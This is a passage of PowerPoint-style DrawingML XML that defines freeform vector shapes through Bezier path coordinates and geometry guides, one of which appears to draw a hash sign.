                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="84" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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5"/>
                      <a:pt x="86" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="71"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="118"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="131"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="141"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="147"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="158"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="198"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="185"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="186"/>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9"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="120"/>
                      <a:pt x="135" y="98"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="111"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="71"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="63"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="55"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="44"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="37"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="38"/>
                      <a:pt x="100" y="39"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="106" y="51"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="45"/>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1"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="67" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="38"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="67"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="44"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71" y="46"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="99" y="40"/>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Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1518"/>
                <a:ext cx="3" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 3"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 2"/>
                  <a:gd name="T9" fmla="*/ 0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1"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="1518"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3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Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="1833"/>
                <a:ext cx="155"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Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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2"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Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="1838"/>
                <a:ext cx="187" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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19">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
